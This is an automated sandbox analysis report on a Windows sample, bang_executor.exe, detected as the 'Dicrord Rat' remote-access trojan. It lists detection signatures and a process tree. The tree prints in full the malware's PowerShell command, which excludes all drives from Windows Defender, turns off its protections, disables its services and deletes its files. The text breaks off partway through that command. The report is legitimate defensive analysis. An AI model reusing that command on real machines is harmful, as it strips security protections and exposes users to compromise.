Edit tour
Windows
Analysis Report
bang_executor.exe
Overview
General Information
Detection
Dicrord Rat
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Yara detected Dicrord Rat
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Adds extensions / path to Windows Defender exclusion list
Bypasses PowerShell execution policy
Contains functionality to disable the Task Manager (.Net Source)
Disable Task Manager(disabletaskmgr)
Disables Windows Defender (via service or powershell)
Disables the Windows task manager (taskmgr)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious PowerShell Parameter Substring
Uses cmd line tools excessively to alter registry or file data
Very long command line found
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Powershell Defender Exclusion
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- bang_executor.exe (PID: 2520 cmdline:
C:\Users\u ser\Deskto p\bang_exe cutor.exe MD5: 043E699DBF3D88B6CCA5FBE64229BA27) - cmd.exe (PID: 2284 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \Temp\RarS FX0\bang.b at" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7000 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - bang_executor.exe (PID: 1236 cmdline:
bang_execu tor.exe MD5: E1EAD094E52097B884389A8064B15E2B) - WerFault.exe (PID: 7948 cmdline:
C:\Windows \system32\ WerFault.e xe -u -p 1 236 -s 232 4 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0) - executer.exe (PID: 2228 cmdline:
executer.e xe MD5: 88E22186F196CC0E1E2D500EEAC57337) - conhost.exe (PID: 6512 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7480 cmdline:
"C:\Window s\system32 \cmd.exe" /C echo Ad d-MpPrefer ence -Excl usionPath "C:\" -Err orAction S ilentlyCon tinue; Add -MpPrefere nce -Exclu sionProces s "C:\*" - ErrorActio n Silently Continue; Set-MpPref erence -Di sableArchi veScanning 1 -ErrorA ction Sile ntlyContin ue; Set-Mp Preference -DisableB ehaviorMon itoring 1 -ErrorActi on Silentl yContinue; Set-MpPre ference -D isableIntr usionPreve ntionSyste m 1 -Error Action Sil entlyConti nue; Set-M pPreferenc e -Disable IOAVProtec tion 1 -Er rorAction SilentlyCo ntinue; Se t-MpPrefer ence -Disa bleRemovab leDriveSca nning 1 -E rrorAction SilentlyC ontinue; S et-MpPrefe rence -Dis ableBlockA tFirstSeen 1 -ErrorA ction Sile ntlyContin ue; Set-Mp Preference -DisableS canningMap pedNetwork DrivesForF ullScan 1 -ErrorActi on Silentl yContinue; Set-MpPre ference -D isableScan ningNetwor kFiles 1 - ErrorActio n Silently Continue; Set-MpPref erence -Di sableScrip tScanning 1 -ErrorAc tion Silen tlyContinu e; Set-MpP reference -DisableRe altimeMoni toring 1 - ErrorActio n Silently Continue; Set-MpPref erence -Lo wThreatDef aultAction Allow -Er rorAction SilentlyCo ntinue; Se t-MpPrefer ence -Mode rateThreat DefaultAct ion Allow -ErrorActi on Silentl yContinue; Set-MpPre ference -H ighThreatD efaultActi on Allow - ErrorActio n Silently Continue; Set-ItemPr operty -Pa th "HKLM:\ SYSTEM\Cur rentContro lSet\Servi ces\WdNisS vc" -Name Start -Val ue 4; Set- ItemProper ty -Path " HKLM:\SYST EM\Current ControlSet \Services\ WinDefend" -Name Sta rt -Value 4; Set-Ite mProperty -Path "HKL M:\SYSTEM\ CurrentCon trolSet\Se rvices\Sen se" -Name Start -Val ue 4; Set- ItemProper ty -Path " HKLM:\SYST EM\Current ControlSet \Services\ WdnisDrv" -Name Star t -Value 4 ; Set-Item Property - Path "HKLM :\SYSTEM\C urrentCont rolSet\Ser vices\wdfi lter" -Nam e Start -V alue 4; Se t-ItemProp erty -Path "HKLM:\SY STEM\Curre ntControlS et\Service s\wdboot" -Name Star t -Value 4 ; Set-Item Property - Path "HKLM :\SOFTWARE \Microsoft \Windows D efender\Re al-Time Pr otection" -Name SpyN etReportin g -Value 0 ; Set-Item Property - Path "HKLM :\SOFTWARE \Microsoft \Windows D efender\Re al-Time Pr otection" -Name Subm itSamplesC onsent -Va lue 0; Set -ItemPrope rty -Path "HKLM:\SOF TWARE\Micr osoft\Wind ows Defend er\Feature s" -Name T amperProte ction -Val ue 4; Set- ItemProper ty -Path " HKLM:\SOFT WARE\Micro soft\Windo ws Defende r" -Name D isableAnti Spyware -V alue 1; Se t-ItemProp erty -Path "HKLM:\SO FTWARE\Pol icies\Micr osoft\Wind ows Defend er" -Name DisableAnt iSpyware - Value 1; R emove-Item -Recurse -Force -Pa th "C:\Pro gramData\W indows\Win dows Defen der\"; Rem ove-Item - Recurse -F